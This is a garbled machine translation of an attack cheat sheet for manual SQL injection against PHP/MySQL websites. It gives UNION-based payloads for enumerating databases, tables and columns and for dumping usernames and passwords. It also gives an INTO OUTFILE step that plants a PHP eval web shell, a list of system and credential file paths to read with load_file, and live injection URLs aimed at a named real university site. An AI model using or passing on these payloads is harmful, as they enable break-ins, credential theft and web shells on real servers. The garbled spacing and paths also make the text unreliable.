PHP + MySQL manual injection statement Daquan recommendation

Violent Field Length

Order by num /*

Matching Field

And 1 = 1 Union select 1, 2, 4, 5 ....... N /*

Violent field location

And 1 = 2 Union select 1, 2, 3, 4, 5 ..... N /*

Using built-in function brute-force database information

Version () database () user ()

You do not need to guess the available field brute-force database information (some websites are not applicable ):

And 1 = 2 Union all select version ()/*

And 1 = 2 Union all select database ()/*

And 1 = 2 Union all Select User ()/*

Operating system information:

And 1 = 2 Union all select @ Global. version_compile_ OS from mysql. User /*

Database permissions:

And ord (mid (user (), 114) =/* return normal description as root

Brute-force database (mysql> 5.0)

MySQL 5 and above have the built-in database information_schema, which stores all the database and table structure information of MySQL.

And 1 = 2 Union select 1, 2, 3, Schema_name, 5, 6, 7, 8, 9, 10 from information_schema.schemata limit 0, 1

Guess table

And 1 = 2 Union select 1, 2, 3, table_name, 5, 6, 7, 8, 9, 10 from information_schema.tables where table_schema = database (hexadecimal) limit 0 (start record, 0 is the first start record), 1 (display 1 record )-

Guess Field

And 1 = 2 Union select 1, 2, 3, column_name, 5, 6, 7, 8, 9, 10 from information_schema.columns where table_name = table name (hexadecimal) limit 0, 1

Brute force password

And 1 = 2 Union select 1, 2, 3, username segment, 5, 6, 7, password segment, 8, 9 from table name limit 0, 1

Advanced usage (two data contents are displayed for one available field ):

Union select 1, 2, 3 Concat (username segment, 0x3c, password segment), 5, 6, 7, 8, 9 from table name limit 0, 1

Write horse directly (root permission)

Condition: 1. Know the physical path of the site

2. Have sufficient permissions (you can use select .... From mysql. User test)

3. magic_quotes_gpc () = off

Select '<? PHP eval ($ _ post [cmd])?> 'Into outfile' physical Path'

And 1 = 2 Union all select one sentence HEX value into OUTFILE 'path'

Load_file () common paths:

1. Replace (load_file (0 × 2f6574632f706173737764), 0 × 3c, 0 × 20)
2. Replace (load_file (char (47,101,116, 115,115,119,100,), char (60), char (32 ))
The above two items are completely displayed in a PHP file. Code . Sometimes, some characters are not replaced. For example, if "<" is replaced with "space", the webpage is returned, and the Code cannot be viewed.
3. load_file (char (47) can be used to list the root directories of FreeBSD and SunOS systems.
4. view the configuration file of the Linux Apache Virtual Host in/etc TPD/conf TPD. conf or/usr/local/Apche/conf TPD. conf.
5. Run c: \ Program Files \ apache group \ apache \ conf \ httpd. conf or c: \ apache \ conf \ httpd. conf to view the Apache file in windows.
6. Run C:/resin-3.0.14/CONF/resin. conf to view the resin file configuration of the website developed by JSP.
7. C:/resin/CONF/resin. CONF/usr/local/resin/CONF/resin. conf
8. D: \ apache \ apache2 \ conf \ httpd. conf
9. c: \ Program Files \ mysql \ My. ini
10../themes/darkblue_orange/layout. Inc. php phpMyAdmin burst path
11. view the virtual host configuration file of IIS in c: \ windows \ system32 \ inetsrv \ metabase. xml.
12. view the resin configuration file 3.0.22 in/usr/local/resin-3.0.22/CONF/resin. conf.
13./usr/local/resin-Pro-3.0.22/CONF/resin. conf is the same as above.
14./usr/local/APP/apache2/CONF/extra tpd-vhosts.conf apashe VM View
15. View firewall policies in/etc/sysconfig/iptables.
16. Equivalent settings of usr/local/APP/PhP5 B/PHP. ini PHP
17./etc/My. CNF MySQL configuration file
18. System Version of/etc/RedHat-release Red Hat
19. c: \ mysql \ data \ mysql \ User. MYD has a user password in the MySQL system.
20,/etc/sysconfig/network-scripts/ifcfg-eth0 to view the IP.
21./usr/local/APP/PhP5 B/PHP. ini // PHP settings
22./usr/local/APP/apache2/CONF/extra tpd-vhosts.conf // virtual website settings
23. c: \ Program Files \ rhinosoft.com \ Serv-U \ servudaemon. ini
24. C: \ Windows \ My. ini
25. c: \ Boot. ini

Common website configuration files: config. Inc. php and config. php. Replace (load_file (HEX), char (60), char (32) must be used for load_file ))

Note:

Char (60) indicates <

Char (32) indicates space

Problems with manual injection:

After the injection, the page displays:

Illegal mix of collations (latin1_swedish_ci, implicit) and (utf8_general_ci, implicit) for Operation 'Union'

Such as: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? Id = 13% 20and % 201 = 2% 20 Union % 20 select % 201, load_file (0x433a5c626f6f742e696e69), 3,4, user () % 20

This is caused by inconsistent pre-and post-encoding,

Solution: Add unhex (hex (parameter) before the parameter. The above URL can be changed:

Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? Id = 13% 20and % 201 = 2% 20 Union % 20 select % 201, unhex (hex (load_file (0x433a5c626f6f742e696e69), 3, 4, unhex (hex (user () % 20

You can continue to inject...